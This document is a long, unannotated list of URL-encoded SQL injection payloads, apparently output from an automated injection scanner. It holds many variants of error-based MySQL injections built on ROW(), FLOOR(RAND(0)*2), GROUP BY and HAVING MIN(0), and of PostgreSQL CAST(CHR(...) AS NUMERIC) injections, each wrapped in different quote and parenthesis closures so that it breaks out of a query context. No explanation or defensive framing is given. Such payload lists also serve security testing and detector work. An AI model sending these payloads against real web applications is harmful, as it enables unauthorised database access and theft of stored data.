-5396%22%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29 -4441%29%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%284517%3D4517 -7166%29%29%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%288469%3D8469 -3808%29%29%29%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%281928%3D1928 -8934%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29 -3523%27%29%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%27ThKQ%27%3D%27ThKQ -8387%27%29%29%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%27rSxo%27%3D%27rSxo -2077%27%29%29%29%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%27YvmE%27%3D%27YvmE -6014%27%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%27xerg%27%3D%27xerg -5251%27%29%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%27WQwy%27%20LIKE%20%27WQwy -9632%27%29%29%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%27mBzN%27%20LIKE%20%27mBzN -2245%27%29%29%29%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%27gJFz%27%20LIKE%20%27gJFz -5422%27%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%27MsqC%27%20LIKE%20%27MsqC -6335%22%29%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%22yXVO%22%3D%22yXVO -5185%22%29%29%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%22CySe%22%3D%22CySe -3410%22%29%29%29%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%22Xwfh%22%3D%22Xwfh -8962%22%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%22lgFe%22%3D%22lgFe -5507%22%29%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%22vSDH%22%20LIKE%20%22vSDH -5703%22%29%29%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%22gZcN%22%20LIKE%20%22gZcN -3529%22%29%29%29%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%22SbkF%22%20LIKE%20%22SbkF -3317%22%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%22mIhz%22%20LIKE%20%22mIhz -2320%29%20WHERE%209779%3D9779%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29 -1509%27%29%20WHERE%208609%3D8609%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29 -7195%27%20WHERE%203108%3D3108%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29 -8203%22%20WHERE%203504%3D3504%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29 -1500%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -8522%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -1925%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -9649%22%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3059%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%285193%3D5193 -8637%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%289583%3D9583 -9277%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%284358%3D4358 -6120%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5091%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%27GUdj%27%3D%27GUdj -4913%27%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%27CSyX%27%3D%27CSyX -4459%27%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%28%27HnTU%27%3D%27HnTU -4777%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%27KBYh%27%3D%27KBYh -4943%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%27UVUd%27%20LIKE%20%27UVUd -8900%27%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%27WFlR%27%20LIKE%20%27WFlR -7920%27%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%28%27PYTv%27%20LIKE%20%27PYTv -4051%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%27cbUn%27%20LIKE%20%27cbUn -9134%22%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%22Ajze%22%3D%22Ajze -3850%22%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%22wiTx%22%3D%22wiTx -4724%22%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%28%22MXYM%22%3D%22MXYM -7333%22%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%22MqLz%22%3D%22MqLz -6130%22%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%22JCQD%22%20LIKE%20%22JCQD -7452%22%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%22aSgB%22%20LIKE%20%22aSgB -7004%22%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%28%22YtAb%22%20LIKE%20%22YtAb -7610%22%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%22Meuh%22%20LIKE%20%22Meuh -2170%29%20WHERE%206421%3D6421%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -7310%27%29%20WHERE%208287%3D8287%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -8556%27%20WHERE%204156%3D4156%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3971%22%20WHERE%202019%3D2019%20OR%201%20GROUP%20BY%20CONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281622%3D1622%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -9833%29%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -6519%27%29%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -9508%27%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -9498%22%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -6483%29%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%284738%3D4738 -7621%29%29%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%288602%3D8602 -9946%29%29%29%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%286336%3D6336 -9692%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -4563%27%29%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%27nuFu%27%3D%27nuFu -2581%27%29%29%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%27DmNA%27%3D%27DmNA -4854%27%29%29%29%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27uUpy%27%3D%27uUpy -6674%27%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%27eLgP%27%3D%27eLgP -1949%27%29%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%27kcPl%27%20LIKE%20%27kcPl -8076%27%29%29%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%27vGff%27%20LIKE%20%27vGff -5579%27%29%29%29%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27alwb%27%20LIKE%20%27alwb -3744%27%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%27BesT%27%20LIKE%20%27BesT 